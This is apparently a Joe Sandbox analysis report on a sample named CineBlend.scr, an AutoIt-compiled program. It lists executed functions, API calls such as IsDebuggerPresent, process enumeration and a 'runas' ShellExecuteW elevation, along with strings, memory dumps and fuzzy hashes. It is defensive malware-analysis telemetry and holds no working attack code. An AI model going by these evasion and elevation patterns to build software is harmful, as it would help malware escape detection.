Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: CineBlend.scrPID: 8488, Parent PID: 8388COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	66

Executed Functions

Function 00B35FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00B35FF7

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

GetCurrentProcess.KERNEL32(?,00BCDC2C,00000000,?,?), ref: 00B36123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00B3612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B36155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B36167
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B36175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00B3617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00B361A1

Strings

GetNativeSystemInfo, xrefs: 00B36161
|O, xrefs: 00B750F7
kernel32.dll, xrefs: 00B36150

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 5e313c5777e9515f0195fa2a9c5c89a8bc6cee550c45a38700fcb3d270872604
Instruction ID: 81f72acc00076254741063b8f2c025caa0de454952a8dd1cfb64305ef755ea96
Opcode Fuzzy Hash: 5e313c5777e9515f0195fa2a9c5c89a8bc6cee550c45a38700fcb3d270872604
Instruction Fuzzy Hash: 78A1C63594A6C4DFCB26CB687C8979D7FDCAB26300F2A98D9D484A7232C67D4548CB31

Function 00B3338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B33368,?), ref: 00B333BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B33368,?), ref: 00B333CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00C02418,00C02400,?,?,?,?,?,?,00B33368,?), ref: 00B3343A

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Part of subcall function 00B3425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B33462,00C02418,?,?,?,?,?,?,?,00B33368,?), ref: 00B342A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00C02418,?,?,?,?,?,?,?,00B33368,?), ref: 00B334BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B73CB0
SetCurrentDirectoryW.KERNEL32(?,00C02418,?,?,?,?,?,?,?,00B33368,?), ref: 00B73CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BF31F4,00C02418,?,?,?,?,?,?,?,00B33368), ref: 00B73D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B73D81

Part of subcall function 00B334D3: GetSysColorBrush.USER32(0000000F), ref: 00B334DE
Part of subcall function 00B334D3: LoadCursorW.USER32(00000000,00007F00), ref: 00B334ED
Part of subcall function 00B334D3: LoadIconW.USER32(00000063), ref: 00B33503
Part of subcall function 00B334D3: LoadIconW.USER32(000000A4), ref: 00B33515
Part of subcall function 00B334D3: LoadIconW.USER32(000000A2), ref: 00B33527
Part of subcall function 00B334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B3353F
Part of subcall function 00B334D3: RegisterClassExW.USER32(?), ref: 00B33590

Part of subcall function 00B335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B335E1
Part of subcall function 00B335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B33602
Part of subcall function 00B335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B33368,?), ref: 00B33616
Part of subcall function 00B335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B33368,?), ref: 00B3361F

Part of subcall function 00B3396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B33A3C

Strings

AutoIt, xrefs: 00B73CA5
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B73CAA
runas, xrefs: 00B73D75

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 1566763e482a209f3e61df137a5a586c95e37f6a3256b1ccfe40534662160f04
Instruction ID: e50ce4d154e4c3a84332b3ab66abe9c114c36a53363f2fe03e5357b566689d1e
Opcode Fuzzy Hash: 1566763e482a209f3e61df137a5a586c95e37f6a3256b1ccfe40534662160f04
Instruction Fuzzy Hash: DE510470208384AAC715EF60DC45E6FBBE8EF94B40F1044ADF596531A2DF348A49D722

Function 00B9DD87 Relevance: 6.1, APIs: 4, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B9DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00B9DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00B9DDDA
CloseHandle.KERNELBASE(00000000), ref: 00B9DE87

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 897368b50f4019afdaf9c869c441c856b76757383f3b05032c2f0a9ddc770637
Instruction ID: b2b705215039488a870c14fbe90a78ed6e13835fb169f7546dd3a9c1f6b95ed5
Opcode Fuzzy Hash: 897368b50f4019afdaf9c869c441c856b76757383f3b05032c2f0a9ddc770637
Instruction Fuzzy Hash: C93180711083019FD711EF60C885EAFBBE8EF99350F5409BDF581871A1EB71AA49CB92

Function 00B55058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00B5502E,00000003,00BF98D8,0000000C,00B55185,00000003,00000002,00000000,?,00B62C59,00000003), ref: 00B55079
TerminateProcess.KERNEL32(00000000,?,00B5502E,00000003,00BF98D8,0000000C,00B55185,00000003,00000002,00000000,?,00B62C59,00000003), ref: 00B55080
ExitProcess.KERNEL32 ref: 00B55092

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f1635928c93089762a932085b3428af021d433b3463ea9d4a6fae4c83460e9a3
Instruction ID: e7fcdd0f93934c1cb35dce5431d60de489d2898c0ebbe739391e1fe6123914a4
Opcode Fuzzy Hash: f1635928c93089762a932085b3428af021d433b3463ea9d4a6fae4c83460e9a3
Instruction Fuzzy Hash: F0E04631000548AFCF216F50CD08E883BA9EB94382F0840A8FC099B1A1DB35DD42CAC0

Function 00B3EE50 Relevance: 21.6, APIs: 14, Instructions: 612windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00B3EF07
timeGetTime.WINMM ref: 00B3F107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3F228
TranslateMessage.USER32(?), ref: 00B3F27B
DispatchMessageW.USER32(?), ref: 00B3F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B3F29F
Sleep.KERNEL32(0000000A), ref: 00B3F2B1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 17df9c1cc5e8bced3851807e8de9be836e35bd30b2c8f57adf66993bb1a97043
Instruction ID: 26e4baaf05e251f51459f972bd176d5de94261c7f5c6e0fe642f5fbcc715ce5b
Opcode Fuzzy Hash: 17df9c1cc5e8bced3851807e8de9be836e35bd30b2c8f57adf66993bb1a97043
Instruction Fuzzy Hash: 3632E130A08642EFD728DF24C884BBAB7E5FF85704F2445AAF555972A1CB71E944CB82

Function 00B33624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B33657
RegisterClassExW.USER32(00000030), ref: 00B33681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B33692
InitCommonControlsEx.COMCTL32(?), ref: 00B336AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B336BF
LoadIconW.USER32(000000A9), ref: 00B336D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B336E4

Strings

+, xrefs: 00B33640
TaskbarCreated, xrefs: 00B33687
AutoIt v3 GUI, xrefs: 00B33673
0, xrefs: 00B33639

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 47bd3374612e8a2b5705a6c7d58cd72847e36524a10f6d8d2242efda79849a17
Instruction ID: 3b2485aa426d1afb5edae7fff08b9b1625e87338d38360c44b4d5077902e573d
Opcode Fuzzy Hash: 47bd3374612e8a2b5705a6c7d58cd72847e36524a10f6d8d2242efda79849a17
Instruction Fuzzy Hash: D62190B9D05218AFDB00DFA8EC89B9DBBB4FB08710F11412AF615A72A0DBB54544CFA5

Function 00B709DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B7071A: CreateFileW.KERNELBASE(00000000,00000000,?,00B70A84,?,?,00000000,?,00B70A84,00000000,0000000C), ref: 00B70737

GetLastError.KERNEL32 ref: 00B70AEF
__dosmaperr.LIBCMT ref: 00B70AF6
GetFileType.KERNELBASE(00000000), ref: 00B70B02
GetLastError.KERNEL32 ref: 00B70B0C
__dosmaperr.LIBCMT ref: 00B70B15
CloseHandle.KERNEL32(00000000), ref: 00B70B35
CloseHandle.KERNEL32(?), ref: 00B70C7F
GetLastError.KERNEL32 ref: 00B70CB1
__dosmaperr.LIBCMT ref: 00B70CB8

Strings

H, xrefs: 00B70C3D

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 655b551e3376d8a6bb5d05e6ae4e33baaa717a81641e93eff8ad93c181bc22c4
Instruction ID: 37d8cc6290f41e69eefb96b708a6bb962f479fe30f6034bb2bc0a8b87b06112e
Opcode Fuzzy Hash: 655b551e3376d8a6bb5d05e6ae4e33baaa717a81641e93eff8ad93c181bc22c4
Instruction Fuzzy Hash: E0A12532A201498FDF19AF78D892BAD7BE0EB06324F14419AF825DB3D1DB359D12CB51

Function 00B352A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B35594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B74B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00B355B2

Part of subcall function 00B35238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B3525A

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B353C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B74BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B74C3E
RegCloseKey.ADVAPI32(?), ref: 00B74C80
_wcslen.LIBCMT ref: 00B74CE7
_wcslen.LIBCMT ref: 00B74CF6

Strings

\Include\, xrefs: 00B35381
Include, xrefs: 00B74BF4, 00B74C35
\, xrefs: 00B74CFC
Software\AutoIt v3\AutoIt, xrefs: 00B353BA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 24c01caa053b7ac6e975c9db20bc63f63a2a764a7576f5b055880e8e113b82d8
Instruction ID: 16eaf75ff79f3f50288be64b317b8ba693f3ce1d05ed243457ec651e035a5669
Opcode Fuzzy Hash: 24c01caa053b7ac6e975c9db20bc63f63a2a764a7576f5b055880e8e113b82d8
Instruction Fuzzy Hash: 53718A71104341AEC704EF69EC81A9EBBECFF98340F9144AEF545871B0EB719A49CB92

Function 00B334D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00B334DE
LoadCursorW.USER32(00000000,00007F00), ref: 00B334ED
LoadIconW.USER32(00000063), ref: 00B33503
LoadIconW.USER32(000000A4), ref: 00B33515
LoadIconW.USER32(000000A2), ref: 00B33527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B3353F
RegisterClassExW.USER32(?), ref: 00B33590

Part of subcall function 00B33624: GetSysColorBrush.USER32(0000000F), ref: 00B33657
Part of subcall function 00B33624: RegisterClassExW.USER32(00000030), ref: 00B33681
Part of subcall function 00B33624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B33692
Part of subcall function 00B33624: InitCommonControlsEx.COMCTL32(?), ref: 00B336AF
Part of subcall function 00B33624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B336BF
Part of subcall function 00B33624: LoadIconW.USER32(000000A9), ref: 00B336D5
Part of subcall function 00B33624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B336E4

Strings

0, xrefs: 00B3355F
AutoIt v3, xrefs: 00B3357F
#, xrefs: 00B33566

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 91a041a328c2950f8c1fdeaed836ac3ff5bf99a9ea8c6390730fa863e8c77038
Instruction ID: 90c0165a660113ab34a438822110a7522409c092173d3b8e64a27377d99c5964
Opcode Fuzzy Hash: 91a041a328c2950f8c1fdeaed836ac3ff5bf99a9ea8c6390730fa863e8c77038
Instruction Fuzzy Hash: 01210975D00318ABDB109FA5EC59BAEBFF8FB08B50F01402AE604A72B0D7B94945CF90

Function 00B3370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B33709,?,?), ref: 00B33777
KillTimer.USER32(?,00000001,?,?,?,?,?,00B33709,?,?), ref: 00B337A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B337C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B33709,?,?), ref: 00B337D1
CreatePopupMenu.USER32 ref: 00B337E5
PostQuitMessage.USER32(00000000), ref: 00B33806

Strings

TaskbarCreated, xrefs: 00B337CC

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 45d908def57bfb31986395076afb093fa07aba33b163bb8952e9c0539c16215e
Instruction ID: da3115378e3516248c8e877ba0441b905fcc22ec18aebd4af36e796316f70b9d
Opcode Fuzzy Hash: 45d908def57bfb31986395076afb093fa07aba33b163bb8952e9c0539c16215e
Instruction Fuzzy Hash: B341D1F5204245FADB242B688C9DF7F3AE9EB04B11F2042A9F506861A1CE789F45D761

Function 00B32AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B32AF9
CoUninitialize.COMBASE ref: 00B32B98
UnregisterHotKey.USER32(?), ref: 00B32D7D
DestroyWindow.USER32(?), ref: 00B73A1B
FreeLibrary.KERNEL32(?), ref: 00B73A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B73AAD

Strings

close all, xrefs: 00B32AF4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 8e35e96b4fd610697e4140efe6cf8f6b3016c8b16fe0f65721bb5241c605236a
Instruction ID: d1c40d60c0bd02df8be5f3ed07275677cae0b586e955c2f56d3a590fae4bff62
Opcode Fuzzy Hash: 8e35e96b4fd610697e4140efe6cf8f6b3016c8b16fe0f65721bb5241c605236a
Instruction Fuzzy Hash: 8FD14935605612DFCB29EF14C986B69F7E0EF04B10F2542EDE95A6B261CB31AE12DF40

Function 00B690C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3c0d5ef44fb3ab55574f5f6f910d5cbc65a9405dc8328802ba42f969b46ded
Instruction ID: de49db7c5b687a339719811edfe3adf866ce87db95cd7f84fea9e8d3347877cc
Opcode Fuzzy Hash: 4c3c0d5ef44fb3ab55574f5f6f910d5cbc65a9405dc8328802ba42f969b46ded
Instruction Fuzzy Hash: 3FC1D17090424AAFDF11DFA8D885BADBBF8FF09310F1841D9E914A7392C7399942CB65

Function 00B4AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 00B4ACA9
d0b, xrefs: 00B4AC96, 00B4AD10, 00B4AEA7
i, xrefs: 00B4B0A3
d10m0, xrefs: 00B4ACF0
d1b, xrefs: 00B4AD55, 00B4AE8E
d5m0, xrefs: 00B4AE75

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 0bea006be824d44a0c7745d3fca5e46f7a3d6eef7a972b8853ca3603611d5bb7
Instruction ID: bf33c8b4b4a027a4de5f681826aab569141bc913836f6b1bf6919ffcb3f566b6
Opcode Fuzzy Hash: 0bea006be824d44a0c7745d3fca5e46f7a3d6eef7a972b8853ca3603611d5bb7
Instruction Fuzzy Hash: 71625875508341DFC724DF24C095AAABBE0FF88304F5089AEE5999B361DB71EA45CF82

Function 00B335B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B335E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B33602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B33368,?), ref: 00B33616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00B33368,?), ref: 00B3361F

Strings

edit, xrefs: 00B335FC
AutoIt v3, xrefs: 00B335D9, 00B335DE, 00B335DF

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
